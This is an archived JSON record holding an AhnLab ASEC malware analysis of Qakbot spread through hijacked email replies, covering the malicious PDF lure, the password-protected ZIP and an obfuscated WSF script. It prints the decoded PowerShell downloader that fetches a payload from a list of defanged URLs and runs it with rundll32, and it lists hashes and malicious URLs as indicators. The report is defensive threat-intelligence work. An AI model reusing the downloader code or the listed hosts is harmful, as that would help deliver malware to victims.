{
	"id": "1995d5bf-d8ce-42cc-ad2c-915c7bfe95ad",
	"created_at": "2026-04-06T00:20:07.1976Z",
	"updated_at": "2026-04-10T03:20:49.368512Z",
	"deleted_at": null,
	"sha1_hash": "b5fb56f18445d379ea8323ffae4a99a292f43190",
	"title": "Qakbot Being Distributed in Korea Through Email Hijacking - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1803106,
	"plain_text": "Qakbot Being Distributed in Korea Through Email Hijacking - ASEC\r\nBy ATCP\r\nPublished: 2023-04-06 · Archived: 2026-04-05 17:37:39 UTC\r\nAhnLab Security Emergency response Center (ASEC) has identified circumstances of Qakbot being distributed via\r\nmalicious PDF files attached to forwarded or replies to existing emails. Qakbot banking malware is one of those that are\r\ncontinuously being distributed through various media. ASEC has covered the distribution trends of Qakbot over the years.\r\nAs shown below, the distributed email has the form of a hijacked normal email where a reply is sent to the target user with a\r\nmalicious file attached to it, and it used the recipients and CC list of the original email for the recipient addresses. The dates\r\nwhen the original emails were sent vary widely, from 2018 to 2022, showing that they were not from recent times. The\r\nbodies and the attachments in the replies are irrelevant to the original email, but they include messages that prompt users to\r\nopen the attachment. Users who receive the email may open the attachment thinking that it is a normal reply, therefore,\r\ncaution is advised.\r\nFigure 1. Email with a malicious PDF attachment (1)\r\nhttps://asec.ahnlab.com/en/51282/\r\nPage 1 of 5\n\nFigure 2. Email with a malicious PDF attachment (2)\r\nFigure 3. Email with a malicious PDF attachment (3)\r\nThe PDF files attached to emails have random characters for their filenames such as ‘UT.PDF’, ‘RA.PDF’, and ‘NM.PDF’,\r\nseemingly generated via automation. When the PDF files are opened, a page containing the Microsoft Azure logo and a\r\nmessage persuading the user to click the Open button is displayed, as shown below. When the Open button is clicked, the\r\nuser is redirected to a malicious URL, and when a connection is established, a password-protected compressed ZIP file is\r\ndownloaded. This password-protected ZIP file can be decompressed with the ‘Password: 755’ written in the PDF file.\r\nhttps://asec.ahnlab.com/en/51282/\r\nPage 2 of 5\n\nFigure 4. Screen upon opening the PDF file attached to the email\r\nFigure 5. Compressed file downloaded from the URL within the PDF file\r\nInvestigation of the WSF file created upon decompression reveals a script code obfuscated among dummy text to bypass the\r\ndetection of antivirus software, as shown below. The meaningful script code lies after the \u003cjob\u003e tag.\r\nhttps://asec.ahnlab.com/en/51282/\r\nPage 3 of 5\n\nFigure 6. WSF script obfuscated with dummy data\r\nWhen the WSF file is executed, an encrypted data command is executed through the PowerShell process. Decrypting this\r\ndata reveals the following. The Qakbot binary is downloaded under the file name undersluice.Calctuffs into the TMP\r\ndirectory from a valid URL and executed through the rundll32.exe process. powershell.exe” -ENC “Start-Sleep -Seconds 2;\r\n$Girnie =\r\n(“hxxp://milleniuninformatica.com[.]br/Le9/jGjSkvEqmXp,hxxps://qassimnews[.]com/yweNej/kQBDu,hxxps://stealingexcellence[.]com/rVR9r/yahxNk,h\r\nlows[.]com/ggAJ2m/kXpW59tm,hxxps://seicas[.]com/KvtM0/Uj3atvfT4E,hxxps://farmfutures[.]in/tlUtBc/IYj0K1,hxxps://alzheimersdigest[.]net/ZKpva/\r\nforeach ($reflexional in $Girnie) {try {wget $reflexional -TimeoutSec 17 -O $env:TEMP\\undersluice.Calctuffs;if ((Get-Item\r\n$env:TEMP\\undersluice.Calctuffs).length -ge 100000) {start rundll32 $env:TEMP\\\\undersluice.Calctuffs,X555;break;}}\r\ncatch {Start-Sleep -Seconds 2;}} This URL is currently unavailable, but internal and external infrastructures showed that the\r\nQakbot binary had been distributed from the URL when a connection could be made to it. Multiple malicious emails are also\r\nbeing distributed with similar formats. Users must be cautious when opening emails from unknown sources and update their\r\nantivirus software to the latest version. [File Detection] Phishing/PDF.Agent (2023.04.07.02) Phishing/PDF.Generic\r\n(2023.04.07.03) Phishing/PDF.Malurl (2023.04.08.00) Trojan/WSF.PSRunner (2023.04.08.00) Trojan/Win.Evo-gen.C5403438 (2023.03.31.02) Trojan/Win.Qakbot.C5406010 (2023.04.06.02) Trojan/Win.Evo-gen.C5406771\r\n(2023.04.07.02) \r\nMD5\r\n19c1526182fe5ed0f1abfafc98d84df9\r\nb57532c33d7fead3105e9312cb544e11\r\nc9ab1cd04e796fd7f084a1dd2d40cc2d\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//milleniuninformatica[.]com[.]br/Le9/jGjSkvEqmXp\r\nhttps[:]//alzheimersdigest[.]net/ZKpva/55C63K\r\nhttps[:]//antoinettegabriel[.]com/YuUE/RQwyJWR2jjc\r\nhttps[:]//choicefaz[.]com[.]br/w1W2/4gPNeUm0J\r\nhttps[:]//farmfutures[.]in/tlUtBc/IYj0K1\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner\r\nbelow.\r\nhttps://asec.ahnlab.com/en/51282/\r\nPage 4 of 5\n\nSource: https://asec.ahnlab.com/en/51282/\r\nhttps://asec.ahnlab.com/en/51282/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/51282/"
	],
	"report_names": [
		"51282"
	],
	"threat_actors": [],
	"ts_created_at": 1775434807,
	"ts_updated_at": 1775791249,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b5fb56f18445d379ea8323ffae4a99a292f43190.pdf",
		"text": "https://archive.orkl.eu/b5fb56f18445d379ea8323ffae4a99a292f43190.txt",
		"img": "https://archive.orkl.eu/b5fb56f18445d379ea8323ffae4a99a292f43190.jpg"
	}
}